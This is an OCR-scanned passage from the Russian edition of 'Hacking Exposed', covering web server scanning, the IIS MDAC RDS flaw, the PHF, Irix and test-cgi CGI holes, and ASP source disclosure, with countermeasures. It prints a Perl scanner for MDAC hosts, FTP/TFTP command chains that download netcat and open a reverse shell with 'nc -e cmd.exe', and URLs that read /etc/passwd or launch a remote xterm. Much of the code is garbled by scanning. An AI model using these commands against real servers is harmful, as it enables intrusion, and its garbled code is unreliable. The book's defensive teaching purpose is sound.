Стюарт Мак-Клар, Джоел Скембрэй, Джордж Куртц. Секреты хакеров. Безопасность сетей - готовые решения
Подождите немного. Документ загружается.
Searching for handler : . . Not Found . .
Searching for webgais : . . Not Found . .
Searching for
websendmail
: . . Not Found . .
Searching for
webdist.cgi
: . . Not Found . .
Searching for faxsurvey : . . Not Found . .
Searching for
htmlscript
: . . Not Found . .
Searching for pfdisplay : . . Not Found . .
Searching
for
perl.exe
: . . Not
Found
. .
Searching for wwwboard.pl : . . Not Found . .
Searching for
www-sql
: . . Not Found . .
Searching for
service.pwd
: . . Not Found . .
Searching for
users.pwd
: . . Not Found . .
Searching for aglimpse : . . Not Found . .
Searching for
man.sh
: . . Not Found . .
Searching for view-source : . . Not Found . .
Searching for
campas
: . . Not Found . .
Searching
for
nph-test-cgi
: . . Not
Found
. .
[gH] - aka gLoBaL
hElL
- are lame kode kiddies
В Internet можно найти десятки
сценариев,
предназначенных для скани-
рования.
На узле
http://www.hackingexposed.com
содержатся ссылки
на самые популярные Web-узлы, на которых содержится самая разнооб-
разная информация по вопросам безопасности.
Приложения автоматизации
Популярность
%
Простота
Опасность
Степень риска
Ч
10
3
8
В Internet можно найти несколько приложений, предназначенных для автоматизи-
рованного поиска хорошо известных изъянов или тех из них, которые становятся дос-
тупными при использовании в процессе установки программного обеспечения пара-
метров, предлагаемых по умолчанию. В отличие от сценариев, эти средства использу-
ются вручную. Это не позволяет использовать их в больших корпоративных сетях,
зато они успешно применяются в малых сетях и на серверах, на которые нужно обра-
тить более пристальное внимание.
Grinder
Программа Grinder версии 1.1
(http://hackersclub.com/km/files/hfiles/
rhino9/grinderll.zip),
поддерживает интерфейс Win32 и позволяет сканировать
IP-адреса из заданного диапазона. Результатом ее работы является отчет, в котором
содержится имя и версия Web-сервера. Это ничем не отличается от применения
обычной команды
HEAD
(например,
с
помощью
утилиты
netcat),
однако
в
процессе
сканирования программой Grinder создается несколько параллельных сокетов, поэто-
му она работает намного быстрее. На рис. 15.3 показано, как Grinder выполняет ска-
нирование и определяет версии Web-серверов.
Глава
15.
Хакинг в Web 605
(1500
IM
P««W
S«*«t»:
|50
Fran
|io*.|ry.|a5r.|T"
t«
fuT.|ir~.|z4if
.(
URIMDER
10.0.240.43
Access
Denied
Simple.
Secue
Web
Server
1.1
_
Puc. 15.3. Программа Grinder может оказаться полезной при одновременном поиске многих Web-
серверов и определении версий применяемого программного обеспечения
Другим средством определения версий Web-серверов являются сканирую-
щие сценарии для системы UNIX, которые можно найти на Web-узле ав-
торов этой книги (http:
//www.hackingexposed.com).
Если в файле пор-
тов указан порт 80, то по умолчанию на Web-сервер будет передана коман-
да
HEAD,
а в
ответном
сообщении будет содержаться
имя и
номер
версии
запущенного программного обеспечения. Эта информация будет помещена
в файл
<имя>/<имя>.http.dump.
Для того чтобы начать процесс сканиро-
вания, можно воспользоваться командой со следующим синтаксисом.
./unixscan.pl
hosts.txt
ports.txt
test
-р -2
-г
После завершения работы сканера будет создан файл, содержащий отчет о
Web-сервера.
11.82
11.83
версии
172.29
172.29
172.29.11.
port
port
80:
80:
port 80:
Server:
Server:
Server;
Microsoft-IIS/4
Microsoft-IIS/3
Microsoft-IIS/4
SiteScan
Программа SiteScan, написанная Хамелеоном (Chameleon) из
групп
Rhino9 и
InterCore,
позволяет выполнить более глубокое исследование, чем Grinder, проверяя на-
личие таких определенных
изъянов,
как
PHF, PHP,
finger,
test.cgi
и др. Это
графи-
ческое приложение Win32 за один раз может исследовать только один IP-адрес, поэтому
его нельзя использовать в сценариях. Придется каждый раз вручную
вводить
IP-адрес и
просматривать полученный результат. На рис. 15.4 показано, как программу SiteScan
можно использовать для проверки Web-сервера на наличие хорошо известных изъянов.
606
Часть IV. Хакинг программного обеспечения
Forbidden
You are not
permitted
to access
the
remote
system.
If
ths
is
an error, then
you
should
contact
your
local fire
vail
administrator.
/*«c.
75.4.
Для ручного поиска хорошо известных уязвимых мест Web-серве-
ров программа
SiteScan
предоставляет приятный графический интерфейс
whisker
Одним из лучших средств сканирования Web-серверов является пакет whisker, раз-
работанный группой
Rain.forest.puppy.
Она также представляет собой сценарий Perl, так
что для ее использования на компьютере должен быть установлен интерпретатор Perl.
(Авторы предпочитают использовать ActivePerl,
http:
//www.activestate.com.)
Пакет whisker по существу состоит из двух частей. Первой является собственно про-
грамма сканирования, а второй — конфигурационные файлы, которые определяют, что
будет сканироваться. Эти файлы называются базами данных сценария (script database) и
имеют расширение
.db.
В состав пакета whisker входит набор баз данных, обеспечиваю-
щий
высокую надежность функционирования. Файл
scan.db
является одной из наиболее
полных баз данных, в которой содержится перечень стандартных свойств Web-сервера,
связанных с обеспечением безопасности. Ниже приводится пример сканирования одного
сервера с помощью утилиты whisker и файла
scan.
db, входящего в комплект поставки.
С:\>whisker.pi
-h victim.com
-s
scan.db
-- whisker /
vl.4.О
/ rain forest puppy /
www.wiretrip.net
--
= Host: victim.com
= Server:
Microsoft-IIS/5.0
+ 200 OK: GET
/whisker.ida
+ 200 OK: GET
/whisker.idq
+ 200 OK: HEAD
/_vti_inf.html
+ 200 OK: HEAD
/_vti_bin/shtml.dll
+ 200 OK: HEAD
/_vti_bin/shmtl.exe
Как видно из полученных результатов, утилита whisker идентифицировала не-
сколько потенциально уязвимых файлов сервера IIS 5, а также наличие фильтров
ISAPI, которым соответствуют файлы
.IDA
и .
IDQ.
(whisker,
ida и
whisker,
idq —
это "ложные" файлы, свидетельствующие о том, что сервер среагировал на соответст-
вующие запросы.) В этом и заключается суть механизма сканирования, реализован-
ного в утилите whisker. Она проверяет наличие файлов с известными брешами. Так
же функционируют и рассмотренные выше сценарии CGI.
Глава 15. Хакинг в Web
607
Преимущество утилиты whisker определяется наличием простого языка написа-
ния сценариев взаимодействия с базой данных. Этот язык описывается в файле
whisker.txt,
входящем в комплект поставки. С помощью этого языка очень просто
разработать свои собственные базы данных.
Несоответствие сценариев требованиям
безопасности: взлом при отсутствии
проверки ввода
Причиной взлома при отсутствии проверки ввода с использованием общего интер-
фейса шлюза (CGI — Common Gateway Interface), активных страниц сервера (ASP —
Active Server Pages) и языка разметки CFML (Cold Fusion Markup Language) является
промах либо разработчика, либо поставщика программного обеспечения. Основная про-
блема возникает из-за недостаточной обработки входных данных некоторым сценарием.
Если не позаботиться о проверке достоверности и последующей очистке входных дан-
ных, взломщик сможет передать сценарию нужный символ, скажем локальную команду,
в качестве параметра и таким образом локально запустить эту команду на Web-сервере.
;:
Изъян MDAC RDS IIS 4.0
Популярность
Простота
Опасность
Степень риска
10
9
10
10
Вскоре после того, как компания Microsoft справилась с проблемой, вызванной
программой
iishack,
работа которой приводила к переполнению
буфера
сервера IIS
(это произошло в июне 1999 года, см. ниже раздел "Переполнение буфера"), в июле ей
пришлось столкнуться с другой проблемой, связанной с Web-сервером. Данная пробле-
ма изначально была описана в бюллетене компании Microsoft, посвященном вопросам
безопасности, еще в 1998 году, но стала известна широкой общественности лишь год
спустя. Этот изъян возникает из-за недостатка одного из компонентов Microsoft доступа
к данным (MDAC — Microsoft Data Access Components) службы RDS (Remote Data Serv-
ice), который позволяет взломщику запускать любые команды на уязвимом сервере.
Первопричина проблемы заключается в объекте
DataFactory
службы
RDS.
По
умолчанию он позволяет передавать удаленные команды серверу IIS.
В:этом
случае
команды запускаются с правами эффективного пользователя этой
службы,
которым
обычно является пользователь SYSTEM. Это означает, что взломщик
моЖет
получить
удаленный доступ с правами администратора к любому серверу в мире, у которого
имеется такой изъян.
Для проверки этой концепции группа по вопросам безопасности
Rain.forest.puppy
разработала свой сценарий на языке Perl (его можно загрузить с Web-узла компании
Security Focus
http://www.securityfocus.com),
посылающий запрос
RpS
базе дан-
ных, которая служит в качестве образца и называется
btcustmr.mdb.
Целью запроса
является запуск на сервере заданной команды.
608 Часть IV.
Хакинг
программного обеспечения
Поиск уязвимых серверов в сети является простой задачей. Посмотрим, как можно
обнаружить
компоненты
MDAC службы
RDS.
С
помощью
утилиты
netcat
и
языка
Perl можно просканировать подсети в поисках признаков уязвимого сервера — нали-
чия динамически подключаемой библиотеки msadcs.dll. Если в результате обработ-
ки HTML-запроса будет получена строка
application/x-varg,
значит, высока веро-
ятность того (хотя и не на 100%), что данная система уязвима. Ниже для примера
приведен код на языке
Perl,
с помощью которого можно обнаружить данный изъян.
#!/usr/bin/perl
if ($#ARGV < 0) {
print "Ошибка в синтаксисе - попробуйте еще
раз.";
print
":
mdac.pl
10.1.2.3-255";
}
doit($ARGV[0]);
foreach $item
(ghosts)
{
portscan($item)
;
}
close
OUTFILE;
sub doit {
$line =
$_[0];
if
($line!=/#/)
{
if
($line=~/-/)
{
@tmp
=
split/-/,
$line;
@bip
=
split//,
$tmp[0];
@eip =
split//,
$tmp[l];
} else {
Sbip
=
split//,
$line;
Seip
=
split//,
$line;
}
$al
=
$bip[0];
$bl =
$bip[l];
$cl =
$bip[2];
$dl =
$bip[3];
$num
= @eip;
if
($num==l)
{
$a2 =
$bip[0];
$b2 =
$bip[l];
$c2 =
$bip[2];
$d2 =
$eip[0];
}
elsif
($num==2)
{
$a2 =
$bip[0];
$b2
=
$bip[l];
$c2 =
$eip[0];
$d2
=
$eip[l];
} elsif
($num==3)
{
$a2 =
$bip[0];
$b2 =
$eip[0];
$c2 =
$eip[l];
$d2 =
$eip[2];
} elsif
($num==4)
{
$a2 =
$eip[0];
$b2 =
$eip[l];
$c2 = $eip[2]
;
$d2 =
$eip[3];
}
#
На базе IP-адреса подсети (класс А, В, С) задаем
# корректные значения
переменных.
Глава15.
ХакингвУ/еЬ
609
check_end
(
) ;
$aend=$a2;
# Создание
массива
.
while ($al <
$aend)
{
while ($bl < $bend) {
while ($cl < $cend) {
while ($dl < $dend) {
push
(@hosts,
"$al.$bl.$cl.$dl")
$dl+=l;
check_end(
)
;
}
$cl+=l;
$dl=0;
}
$bl+=l;
$cl=0;
}
$al+=l;
$bl=0;
sub portscan {
my $target =
$_[0]
;
print "Сканируется порт
$target.";
local
$/;
open(SCAN,
"nc
-vzn -w 2 $target 80
2»&1
|")
;
# Порт открыт
$result =
<SCAN>;
if
($result=~/open/)
{
print
"\tITopT
80 на $target
открыт.
\n";
print
OUTFILE
"Порт 80
открыт\п";
open (HTTP,
">http.
tmp")
;
print HTTP "GET
/msadc/msadcs.dll
HTTP/1
.
0\n\n";
close HTTP;
open(SCAN2, "type
http.tmp
| nc -nvv -w 2 $target 80 2>&1
\")
;
$result2 =
<SCAN2>;
if
($result2=~/Microsoft-IIS4.0/)
{
if
($result2=~/x-varg/)
(
print
"$target
уязвима против атаки
MDAC.";
print OUTFILE
"$target
может быть уязвима против атаки
MDAC.";
close
SCAN;
}
}
sub check_end {
if
(($al==$a2)
&&
($Ы==$Ь2)
&&
($cl==$c2))
{
$dend=$d2;
} else
{
$dend=255;
}
if
(($al==$a2)
&&
($bl==$b2)
)
{
$cend=$c2;
} else {
$cend=255;
}
if ($al= =$a2) {
610
Часть IV. Хакинг программного обеспечения
$bend=$b2;
} else {
$bend=255;
При
использовании параметра
-п
команды
netcat
требуется, чтобы
в ко-
мандной строке явно указывался IP-адрес.
"Анатомия" атаки
Сценарий Perl можно найти на многих Web-узлах, в том числе в архиве NTBugtraq
(http://www.ntbugtraq.com)
или на узле компании Security Focus
(http://www.securityfocus.com).
Он работает одинаково эффективно как в систе-
ме UNIX, так и в NT, и предпринимает попытку установить связь с компонентами
MDAC, чтобы добавить
в
запрос
SQL
строку
I
shell
($command)
|.
Когда компонент
MDAC достигает команды
shell,
выполняется команда, заданная
в
переменной
$command.
Для того чтобы убедиться в наличии описанной возможности, попробуйте
запустить команду со следующим синтаксисом.
C:\>perl
mdac_exploit.pl
-h
192.168.50.11
— RDS exploit by rain forest puppy / ADM /
Wiretrip
--
Command: <run your command here>
Step 1: Trying raw driver to
btcustmr.mdb
winnt ->
c:
Success!
Разработка корректной команды для системы NT — непростая задача.
Сомил
Шах
(Somil
Shah) и Нитеш
Даньяни
(Nitesh Dhanjani) вместе с Джорджем
Курцом
(George
Kurtz) разработали интересную последовательность команд, которые можно загрузить с
помощью
TFTP
или FTP. В результате будет загружена и запущена утилита netcat, воз-
вращающая обратно командную оболочку системы NT
(cmd
.
exe). Например, с использо-
ванием средств FTP можно воспользоваться следующей последовательностью команд.
"cd
SystemRoot
6&
echo
$ftp_user>f
tptmp
&& echo
$f
tp_pass»ftptmp
&&
echo
bin»f
tptmp
&&
echo
get
nc
.
exe»f
tptmp
&&
echo
bye»f
tptmp
&&
ftp
-s:f
tptmp
$ftp_ip SS del
f
tptmp
&& attrib
-r
nc.exe
SS nc
-e
cmd
.
exe
$my_ip
$my_port"
При использовании TFTP аналогичные команды будут выглядеть следующим образом.
"cd
\%SystemRoot\%
&&
tftp
-i
$tftp_ip
GET
nc.exe nc.exe
&&
attrib
-r
nc.exe
&&
nc -e
cmd.
exe
$my_ip
$my_port"
Применение этих команд в сценарии Perl позволит вернуть командную оболочку
удаленной системы, с помощью которой можно будет загрузить любое количество
файлов, включая утилиту
pwdump2
.
exe (позволяющую получить
хэш-коды
из базы
данных SAM), а затем приступить ко взлому с применением утилит LOphtcrack или
John vl.6. Если команда оказалась неработоспособной, то не исключено, что на пути к
порту TCP (FTP) с номером 21 или порту UDP (TFTP, 69) целевой системы находит-
ся маршрутизатор или брандмауэр.
О Контрмеры: защита компонентов MDAC службы RDS
Для того чтобы предотвратить такие атаки, либо удалите все файлы, используемые
в этом случае, либо измените конфигурационные параметры сервера. Более подробную
информацию по этому вопросу можно найти по адресу
http://www.
microsoft.
com/technet/security/bulletins/MS99-025faq.asp.
Глава
15.
Хакинг в Web 611
Изъяны CGI
Популярность
Простота
Опасность
Степень риска
8
9
9
9
По-видимому, после переполнения буфера плохо написанные сценарии CGI яв-
ляются наиболее опасными изъянами в Internet. В электронном мире еще можно най-
ти Web-серверы, разработчики которых экономили время на программировании, а
после того, как взломщик пробрался на сервер и навел там свои порядки, пожалели о
своей спешке. В этом разделе описано несколько наиболее популярных изъянов сце-
нариев CGI, а также последствия, к которым приводит их использование.
V Сценарий PHF
Возможно, одним из наиболее старых и в наши дни редко встречающихся изъянов
является сценарий PHF, который изначально применялся на серверах
HTTPD
центра
NCSA (версия
1.5A-Export
или более ранние) и сервера Apache (версии 1.0.3). Эта
программа CGI является примером сценария, обеспечивающего
интерфейс
в виде
форм, который можно использовать для поиска имен и адресов в адресной книге. Из-
за того что в этом сценарии для проверки входных данных используется функция
escape_shell_cmd(),
он оказывается уязвимым для широко распространенной ата-
ки, при которой обманным путем удается локально запускать команды. Символ новой
строки (ОхОа в
шестнадцатеричной
системе счисления) не проверяется при контроле
правильности входных данных. Поэтому он может быть использован для прерывания
выполнения сценария и запуска любой команды, указанной после этого символа, в
локальном контексте Web-сервера. Например, введение следующего адреса URL при-
ведет к извлечению файла паролей, если пользователь, запустивший Web-сервер, об-
ладает правами доступа к этому файлу.
http://192.168.51.101/cgi-bin/phf?Qalias=x%Oa/bin/cat%20/etc/passwd
Следующий адрес URL позволит взломщику получить в свое распоряжение окно
xterm
удаленного узла (при условии, что его IP-адрес является маршрутизируемым).
http://192.168.51.101/cgi-
bin/phf
?Qalias=x%Oa/usr/openwin/bin/xterm%20-
display%20172.29.11.207:0.0%20&
Более подробную информацию об изъяне сценария PHF можно найти по адресу
http://oliver.efri.hr/~crv/security/bugs/mUNIXes/httpd3.html.
О Контрмеры
Предотвращение
Лучше всего удалите этот сценарий с Web-сервера. Скорее всего, на рабочем сер-
вере такой сценарий не требуется.
612
Часть IV. Хакинг программного
обеспечения
Обнаружение
Средства обнаружения атак, направленных на использование изъяна PHF, встрое-
ны почти в каждую бесплатную или коммерческую систему выявления вторжений, так
что в этом случае решить проблему безопасности будет несложно.
| С
помощью программы
phfprobe.pl
можно
привлечь взломщиков
к
своему
Web-узлу и зафиксировать выполняемые ими действия. В процессе анализа
полученных данных можно лучше продумать стратегию защиты. Данный сце-
нарий Perl служит в качестве приманки, имитирующей сценарий
PHF.
Он от-
правляет взломщикам такие ответные сообщения, как будто предпринимае-
мые ими действия выполняются успешно. На самом же деле осуществляется
сбор информации о взломщиках и их тактике. Эту ловушку следует применять
только при полной уверенности в надежности системы.
•*«."
Изъяны CGI системы Их
Первое сообщение об изъяне CGI системы
Irix
появилось в 1997 году в бюллетене
Bugtraq.
Новость опубликовал Разван
Драгомиреску
(Razvan
Dragomirescu). Он обна-
ружил, что в состав подсистемы Outbox Environment многих систем Irix входит не-
сколько программ, уязвимых для атак, основанных на отсутствии проверки ввода.
Сценарий
webdist.cgi,
а также сценарии-оболочки систем
Irix
5.x и 6.x позволяют
взломщикам передавать локальные команды и запускать их на удаленном узле. Для
просмотра файла паролей UNIX можно воспользоваться следующим URL (конечно,
если пользователь Web-сервера обладает необходимыми привилегиями).
http://192.168.51.101/cgi-bin/handler/something;cat<tab>/etc/
passwd|?data=Download<tab>HTTP/l.0
I Подстрока
<tab>
обозначает реальный символ табуляции.
О Контрмеры: использование изъянов CGI систем Irix
Как и раньше, если сценарий не применяется, лучше всего удалить его из системы
и тем самым предотвратить возможность использования его изъянов. Если же удалить
сценарий невозможно, воспользуйтесь модулем обновления SGI, который можно най-
ти по адресу
http://www.sgi.com/support/patch_intro.html.
^
«
t о
*
*Л'
P
test-cgi
Впервые об этом изъяне широкой общественности сообщила группа
LOpht
в 1996
году. С его использованием взломщик может удаленно получать информацию о фай-
лах, которые имеются на целевом узле. Например, используя следующий URL,
взломщик может просмотреть список всех файлов и каталогов, которые содержатся в
каталоге сценариев (cgi-bin).
http://192.168.51.101/cgi-bin/test-cgi?*
В
результате
на
экран будет
выведено
значение
переменной
окружения
QUERY_STRING.
QUERY_STRING
=
count.cgi
createuser.pl
nph-test-cgi
phf
php.cgi
search.pl
test-cgi
wwwcount.cgi
Глава
15.
Хакинг
в Web
613
Конечно же, получение перечня имеющихся в системе сценариев поможет взлом-
щику найти другие слабые места, через которые можно будет получить доступ к Web-
серверу, например PHF, РНР и т.д. Эта информация откроет взломщику доступ к
удаленному узлу с правами пользователя или даже суперпользователя, а впоследствии
он добьется контроля над всей системой UNIX.
О Контрмеры: использование изъянов CGI
Если обычное решение проблемы (удаление сценария) по каким-либо причинам
реализовать нельзя, стоит обратиться к некоторым ресурсам Internet, в которых можно
найти советы по безопасному написанию сценариев.
Т http://www.go2net.cora/people/paulp/cgi-security/
•
http://www.sunworld.com/swol-04-1998/swol-04-security.html
•
http://www.wS.org/Security/Faq/wwwsf4.html
•
ftp://ftp.cert.org/pub/tech_tips/cgi_metacharacters
A
http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec/
Уязвимость страниц ASP сервера IIS
Популярность
Простота
Опасность
Степень риска
8
9
5
7
Активные страницы сервера (ASP — Active Server Page) представляют собой разра-
ботку компании Microsoft,
аналогичную
сценариям Perl и интерфейсу CGI системы
UNIX. Обычно написанный на языке VBScript, код ASP выполняет многое из того,
что необходимо для поддержки состояния, обеспечения доступа к серверной части ба-
зы данных и отображения кода HTML в окне броузера. Одной из приятных особенно-
стей страниц ASP является то, что они могут "на лету" генерировать страницы
HTML. Другой малоприятной особенностью являются многочисленные изъяны стра-
ниц ASP, позволяющие взломщику просматривать их исходный код. Почему это пло-
хо? Во-первых, потому, что взломщик, изучая логику программы, может Обнаружить
и другие изъяны. Во-вторых, он может найти в этих файлах такую важную информа-
цию, как база данных имен и паролей пользователей.
да
Хакинг
сервера IIS и соответствующие контрмеры более подробно рассмат-
риваются в книге Стюарта Мак-Клара и
Джоела
Скембрея Секреты хакеров.
Безопасность Windows
2000—
готовые решения, вышедшей в Издатель-
ском доме "Вильяме".
4
.°
о
'
*
• Ошибка ASP, связанная с интерпретацией точки
В 1997 году
Велд
Понд
(Weld Pond) из группы
LOpht
обнаружил ошибку, которая
возникает, если одну или несколько точек поставить после адреса URL страницы ASP
сервера IIS 3.0. При этом можно просмотреть исходный код ASP и проанализировать
логику этой программы. Еще важнее то, что в данном файле можно найти такую важ-
614
Часть IV. Хакинг программного обеспечения